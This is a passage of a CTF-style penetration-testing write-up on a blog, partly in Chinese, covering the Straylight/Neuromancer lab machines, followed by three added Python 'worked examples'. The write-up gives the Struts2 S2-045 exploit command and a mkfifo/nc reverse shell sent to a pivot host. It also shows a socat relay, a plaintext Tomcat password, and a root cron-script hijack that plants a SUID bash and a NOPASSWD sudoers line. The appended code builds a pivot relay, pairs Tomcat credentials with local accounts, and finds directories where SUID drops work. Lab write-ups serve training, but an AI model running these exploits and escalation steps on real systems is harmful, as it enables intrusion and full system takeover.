linux\/webapps\/41570.py\npython2.7  41570.py  http:\/\/10.5.160.11:5656\/struts2_2.3.15.1-showcase\/ id\n&#91;*] CVE: 2017-5638 - Apache Struts2 S2-045\n&#91;*] cmd: id\n\nuid=1000(ta) gid=1000(ta) groups=1000(ta),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)\n<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">II. Getting a foothold<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Blind command execution is enough to bootstrap a reverse shell. Neuromancer cannot reach Kali directly, so the payload connects back to Straylight at 192.168.56.5:1234, where the socat listener started earlier relays it to the nc listener on Kali (192.168.38.107:1234). The exploit is driven here with struts-pwn.py, another S2-045 exploit script, and the payload is the usual mkfifo\/nc reverse shell:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>root@straylight:\/root# socat TCP-LISTEN:1234,fork TCP4:192.168.38.107:1234&amp;\n&#91;4] 26616\npython struts-pwn.py -u  http:\/\/192.168.38.238:5656\/struts2_2.3.15.1-showcase\/ -c \"rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 192.168.56.5 1234 &gt;\/tmp\/f\"\nnc -lvp 1234<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">That gives a shell on Neuromancer as the user ta.<\/p>\n\n\n\n<h2 
class=\"wp-block-heading\">\u4e09\u3001\u63d0\u6743<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>cat \/usr\/local\/tomcat\/conf\/tomcat-users.xml\n&lt;user username=\"Lady3Jane\" password=\"&amp;gt;&amp;#33;&amp;#88;&amp;#120;&amp;#51;&amp;#74;&amp;#97;&amp;#110;&amp;#101;&amp;#120;&amp;#88;&amp;#33;&amp;lt;\" roles=\"manager-gui\"\/&gt;\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>ta@neuromancer:\/home\/lady3jane$ su lady3jane\nlady3jane@neuromancer:~$ sudo -l\n&#91;sudo] password for lady3jane: \nSorry, user lady3jane may not run sudo on neuromancer.\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>lady3jane@neuromancer:~$ ls -al\ntotal 32\ndrwxr-xr-x 3 lady3jane lady3jane 4096 Jul  1  2018 .\ndrwxr-xr-x 4 root      root      4096 Jul  1  2018 ..\n-rw------- 1 lady3jane lady3jane   30 Jul  3  2018 .bash_history\n-rw-r--r-- 1 lady3jane lady3jane  220 Jul  1  2018 .bash_logout\n-rw-r--r-- 1 lady3jane lady3jane 3771 Jul  1  2018 .bashrc\ndrwx------ 2 lady3jane lady3jane 4096 Jul  1  2018 .cache\n-rwxr-x--- 1 lady3jane lady3jane  440 Jul  1  2018 custom-tomcat-chk.sh\n-rw-r--r-- 1 lady3jane lady3jane  655 Jul  1  2018 .profile\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u5148\u628apspy64  \u4f20\u5230  Straylight  \u7136\u540e\u518d\u4e0b\u8f7d\u5230neuromancer<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>lady3jane@neuromancer:\/tmp$ wget http:\/\/192.168.56.5:7777\/pspy64 \nlady3jane@neuromancer:\/tmp$ chmod +x pspy64\nlady3jane@neuromancer:\/tmp$ .\/pspy64 -i 1000 -p\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528pspy64 \u67e5\u770b\u8fdb\u7a0b\u4fe1\u606f  root  \u6709\u4e00\u4e2a \u5b9a\u65f6\u4efb\u52a1<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>2024\/05\/18 04:36:01 CMD: UID=0     PID=2533   | \/bin\/bash \/home\/lady3jane\/server-check.sh \n2024\/05\/18 04:36:01 CMD: UID=0     PID=2532   | \/bin\/sh -c 
\/bin\/bash \/home\/lady3jane\/server-check.sh \n2024\/05\/18 04:36:01 CMD: UID=0     PID=2531   | \/usr\/sbin\/CRON -f \n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>lady3jane@neuromancer:~$ mv custom-tomcat-chk.sh  \/home\/lady3jane\/server-check&gt;\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u5b9a\u65f6\u4efb\u52a1\u7684\u6587\u4ef6\u540d\u548c\u5b58\u5728\u7684\u4e0d\u4e00\u6837 \u4fee\u6539\u6210\u4e00\u6837  \u7136\u540e\u91cd\u65b0\u5199\u5165<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>lady3jane@neuromancer:~$ vim server-check.sh \n\n#!\/bin\/bash\n# ..the AI tells me it can maintain security, server health, etc w\/o forced inte\nrvention,\n# but I beg to differ...hence the cron script.\ncp \/bin\/bash \/home\/lady3jane\/rootbash\nchmod +xs \/home\/lady3jane\/rootbash\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">2. <strong>\u6587\u4ef6\u7cfb\u7edf\u6302\u8f7d\u9009\u9879<\/strong><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u67d0\u4e9b\u6587\u4ef6\u7cfb\u7edf\u6302\u8f7d\u9009\u9879\uff08\u5982 <code>nosuid<\/code>\uff09\u4f1a\u7981\u6b62 SetUID \u4f4d\u751f\u6548\u3002\u5982\u679c <code>\/tmp<\/code> \u6216\u5305\u542b <code>\/tmp<\/code> \u7684\u6587\u4ef6\u7cfb\u7edf\u662f\u4ee5 <code>nosuid<\/code> \u9009\u9879\u6302\u8f7d\u7684\uff0c\u5219 SetUID \u4f4d\u4e0d\u4f1a\u751f\u6548\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f60\u53ef\u4ee5\u901a\u8fc7\u4ee5\u4e0b\u547d\u4ee4\u68c0\u67e5 <code>\/tmp<\/code> \u7684\u6302\u8f7d\u9009\u9879\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>lady3jane@neuromancer:~$ vim server-check.sh \n\n\n\n#!\/bin\/bash\n# ..the AI tells me it can maintain security, server health, etc w\/o forced inte\nrvention,\n# but I beg to differ...hence the cron script.\necho \" lady3jane ALL=(ALL) NOPASSWD: ALL\" &gt;&gt; \/etc\/sudoers\necho \"ok\" &gt;&gt;\/home\/lady3jane\/ok<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>lady3jane@neuromancer:~$ sudo -l\nMatching 
Defaults entries for lady3jane on neuromancer:\nenv_reset, mail_badpass,\nsecure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser lady3jane may run the following commands on neuromancer:\n(ALL) NOPASSWD: ALL\n\nsudo su<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">After the next cron run, sudo -l shows the new entry and <code>sudo su<\/code> gives a root shell on Neuromancer. Privilege escalation complete. One caveat for real engagements: appending to \/etc\/sudoers with echo works here, but a syntax error in that file breaks sudo for everyone; a separate file under \/etc\/sudoers.d checked with <code>visudo -c<\/code> is the safer way to do the same thing.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Two machines Straylight Neuromancer Straylight &#8211; simulate [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[28,54,55,72,74,78,91,96,109],"class_list":["post-439","post","type-post","status-publish","format-standard","hentry","category-target-aircraft","tag-echo-sudoers","tag-nosuid","tag-ntop-","tag-python-sehll","tag-rm-nc-shell","tag-smtp-","tag-struts2-exploit","tag-tomcat-9-0-","tag-109"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/439","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=439"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/439\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=439"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=439"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu1
2.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=439"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
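Worked example for the socat pivot set up on Straylight in the write-up above: a fork-per-connection TCP relay in Python that does what `socat TCP-LISTEN:<port>,fork TCP4:<host>:<port>` does. This is an added example written for this edit, not code from the original post or from socat. Listen and target hosts and ports are parameters; `relay_roundtrip()` stands up a constructed loopback echo server in place of Neuromancer's services so the whole thing runs offline. The half-close handling in `_pump` is the part that matters for request/response protocols: without propagating EOF in both directions a client waiting on the far side's reply would hang.

```python
"""Fork-per-connection TCP relay, the Python equivalent of the socat
TCP-LISTEN:<port>,fork TCP4:<host>:<port> listeners used on Straylight.

Added example for this write-up (not from the original post or socat).
Hosts/ports are parameters; relay_roundtrip() uses a constructed loopback
echo server instead of Neuromancer's services so it runs offline.
"""
import socket
import threading


def _pump(src, dst):
    """Copy src -> dst until EOF, then half-close dst so the far side sees
    EOF too. Propagating EOF both ways is what lets a request/response pair
    pass cleanly through the relay."""
    try:
        while True:
            data = src.recv(65536)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _handle(client, target):
    """One relayed connection: dial the target, pump both directions."""
    try:
        upstream = socket.create_connection(target, timeout=10)
    except OSError:
        client.close()  # target unreachable: drop the client
        return
    upstream.settimeout(None)
    back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
    back.start()
    _pump(client, upstream)  # client -> target in this thread
    back.join()  # wait for target -> client to drain
    client.close()
    upstream.close()


def start_relay(listen_host, listen_port, target_host, target_port):
    """Listen on listen_host:listen_port, relay each connection to the
    target (one thread per connection, like socat's fork). Returns the
    listening socket and the bound port; port 0 picks a free one."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(16)
    target = (target_host, target_port)

    def accept_loop():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:
                return  # listener closed
            threading.Thread(target=_handle, args=(client, target), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def start_echo_server():
    """Constructed stand-in for the internal service: echoes bytes back."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def serve(conn):
        _pump(conn, conn)
        conn.close()

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=serve, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def relay_roundtrip(payload):
    """Send payload client -> relay -> echo server; return what comes back."""
    echo, echo_port = start_echo_server()
    relay, relay_port = start_relay("127.0.0.1", 0, "127.0.0.1", echo_port)
    try:
        with socket.create_connection(("127.0.0.1", relay_port), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)  # our EOF travels through the relay
            chunks = []
            while True:
                data = c.recv(65536)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks)
    finally:
        relay.close()
        echo.close()


if __name__ == "__main__":
    # On Straylight the equivalent of the first socat line would be:
    #   start_relay("0.0.0.0", 5656, "192.168.56.4", 8080)
    print(relay_roundtrip(b"GET / HTTP/1.0\r\n\r\n"))
```

Each listener is a separate `start_relay` call; nothing in it authenticates the client, which is the same property the socat one-liners have, so tear the relays down when the pivot is no longer needed.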
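Worked example for the privilege-escalation section above, where the Lady3Jane password in tomcat-users.xml is stored as XML character references. This is an added example for this edit, not code from the original post or from Tomcat. `SAMPLE` is constructed from the single `<user>` line the post shows; the enclosing `<tomcat-users>` element, its namespace and the `<role>` line are assumptions. `su_candidates` encodes the step the write-up took by hand: matching the Tomcat account name against local accounts case-insensitively and trying the decoded password with su.

```python
"""Extract accounts from a Tomcat tomcat-users.xml, decoding the XML
character references used to obscure the manager-gui password.

Added example for this write-up, not from the original post or Tomcat.
SAMPLE is constructed: only the <user> line comes from the post; the
<tomcat-users> wrapper, namespace and <role> line are assumed.
"""
import xml.etree.ElementTree as ET

SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <user username="Lady3Jane" password="&gt;&#33;&#88;&#120;&#51;&#74;&#97;&#110;&#101;&#120;&#88;&#33;&lt;" roles="manager-gui"/>
</tomcat-users>
"""


def _local(tag):
    """Strip a {namespace} prefix; the file may or may not declare one."""
    return tag.rsplit("}", 1)[-1]


def parse_tomcat_users(xml_text):
    """Return {username: {"password": str, "roles": [str, ...]}}.

    ElementTree resolves both named (&gt;) and numeric (&#33;) references
    while parsing, so "password" is the literal string Tomcat compares
    against, i.e. what you would type at the Manager login or at su."""
    users = {}
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        # Tomcat's MemoryUserDatabase accepts "username" or legacy "name"
        name = el.get("username") or el.get("name")
        roles = [r.strip() for r in (el.get("roles") or "").split(",") if r.strip()]
        users[name] = {"password": el.get("password", ""), "roles": roles}
    return users


def users_with_role(users, role):
    """Accounts holding a role, e.g. who can reach the Manager application."""
    return sorted(u for u, info in users.items() if role in info["roles"])


def su_candidates(users, local_users):
    """Pair each Tomcat account with a local account of the same name,
    compared case-insensitively (Lady3Jane vs lady3jane here), giving the
    (local user, password) pairs worth trying with su or ssh."""
    by_lower = {u.lower(): u for u in local_users}
    return sorted(
        (by_lower[name.lower()], info["password"])
        for name, info in users.items()
        if name.lower() in by_lower
    )


if __name__ == "__main__":
    found = parse_tomcat_users(SAMPLE)
    print(found)
    # local_users would come from /etc/passwd on the target; constructed here
    print(su_candidates(found, ["root", "ta", "lady3jane"]))
```

The defensive reading of the same parser: any account in the manager-gui list with a plaintext (undigested) password that also matches a system account is the finding to report.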
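Worked example for the mount-options note in the privilege-escalation section above: given a `/proc/self/mounts`-style table, decide whether a setuid binary dropped at a path (the `rootbash` copy) would actually take effect, and filter a list of candidate drop directories down to the usable ones. This is an added example for this edit, not code from the original post. The post never shows Neuromancer's mount table, so `SAMPLE_MOUNTS` is constructed; its `nosuid` entries for `/home`, `/tmp` and `/dev/shm` are assumptions chosen to exercise the failure mode. On a target, pass `open('/proc/self/mounts').read()` instead.

```python
"""Would a setuid bit on a file at PATH be honoured by the kernel?
Decided from a /proc/self/mounts-style table (longest-prefix match of
the mount point, then look for nosuid in the option list).

Added example for this write-up, not from the original post. The sample
table is constructed: the nosuid /home, /tmp and /dev/shm lines are
assumptions, not Neuromancer's real configuration.
"""

SAMPLE_MOUNTS = """\
sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
/dev/sdb1 /home ext4 rw,nosuid,nodev,relatime 0 0
/dev/sdc1 /mnt/my\\040data ext4 rw,relatime 0 0
"""


def parse_mounts(text):
    """Return [(mountpoint, set(options)), ...] from /proc/mounts text.
    Fields are: device mountpoint fstype options dump pass. A space inside
    a mount point is encoded by the kernel as the four characters \\040."""
    table = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        mountpoint = parts[1].replace("\\040", " ")
        table.append((mountpoint, set(parts[3].split(","))))
    return table


def mount_for(path, table):
    """The mount that actually holds path: longest matching mount point.
    '/' matches everything, so a more specific mount must win, and
    '/home' must not match '/homeless'."""
    best = None
    for mountpoint, opts in table:
        prefix = mountpoint.rstrip("/") + "/"
        if path == mountpoint or path.startswith(prefix):
            if best is None or len(mountpoint) > len(best[0]):
                best = (mountpoint, opts)
    return best


def suid_effective(path, mounts_text):
    """True if a setuid binary at path would change uid when executed."""
    m = mount_for(path, parse_mounts(mounts_text))
    return m is not None and "nosuid" not in m[1]


def suid_drop_locations(candidates, mounts_text):
    """Keep only the candidate directories where a SUID drop would work."""
    return [d for d in candidates if suid_effective(d, mounts_text)]


if __name__ == "__main__":
    # On a real host: table = open("/proc/self/mounts").read()
    for p in ("/home/lady3jane/rootbash", "/tmp/rootbash", "/usr/bin/sudo"):
        print(p, "suid effective:", suid_effective(p, SAMPLE_MOUNTS))
    print(suid_drop_locations(["/tmp", "/home/lady3jane", "/dev/shm", "/var/tmp"], SAMPLE_MOUNTS))
```

The check answers only the mount-option question; a copied bash additionally needs `-p` at run time to keep the effective uid, which is a separate reason a `rootbash` can appear not to work.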